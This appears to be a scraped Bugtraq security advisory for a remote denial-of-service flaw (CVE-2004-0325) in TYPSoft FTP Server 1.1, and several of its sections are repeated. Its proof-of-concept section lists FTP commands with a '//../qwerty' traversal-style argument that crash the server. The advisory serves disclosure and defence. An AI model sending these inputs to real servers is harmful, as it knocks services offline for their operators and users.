TYPSoft FTP Server Remote CPU Consumption Denial Of Service Vulnerability
BID:9702
Info
TYPSoft FTP Server Remote CPU Consumption Denial Of Service Vulnerability
| Bugtraq ID: | 9702 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2004-0325 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Discovery of this issue has been credited to "intuit bug_hunter" <[email protected]>. |
| Vulnerable: |
TYPSoft TYPSoft FTP Server 1.1 |
| Not Vulnerable: | |
Discussion
TYPSoft FTP Server Remote CPU Consumption Denial Of Service Vulnerability
It has been reported that TYPESoft FTP Server is prone to a remote denial of service vulnerability that may allow an attacker to cause the server to crash.
This vulnerability has been reported to affect version 1.10 of the software, however, previous versions may also be affected.
It has been reported that TYPESoft FTP Server is prone to a remote denial of service vulnerability that may allow an attacker to cause the server to crash.
This vulnerability has been reported to affect version 1.10 of the software, however, previous versions may also be affected.
Exploit / POC
TYPSoft FTP Server Remote CPU Consumption Denial Of Service Vulnerability
No exploit is required.
The following proof of concept examples have been provided:
mkd //../qwerty
xmkd //../qwerty
dele //../qwerty
size //../qwerty
retr //../qwerty
stor //../qwerty
appe //../qwerty
rnfr //../qwerty
rnto //../qwerty
rmd //../qwerty
xrmd //../qwerty
No exploit is required.
The following proof of concept examples have been provided:
mkd //../qwerty
xmkd //../qwerty
dele //../qwerty
size //../qwerty
retr //../qwerty
stor //../qwerty
appe //../qwerty
rnfr //../qwerty
rnto //../qwerty
rmd //../qwerty
xrmd //../qwerty
Solution / Fix
TYPSoft FTP Server Remote CPU Consumption Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
TYPSoft FTP Server Remote CPU Consumption Denial Of Service Vulnerability
References:
References:
- TYPSoft FTP Server Homepage (TYPSoft)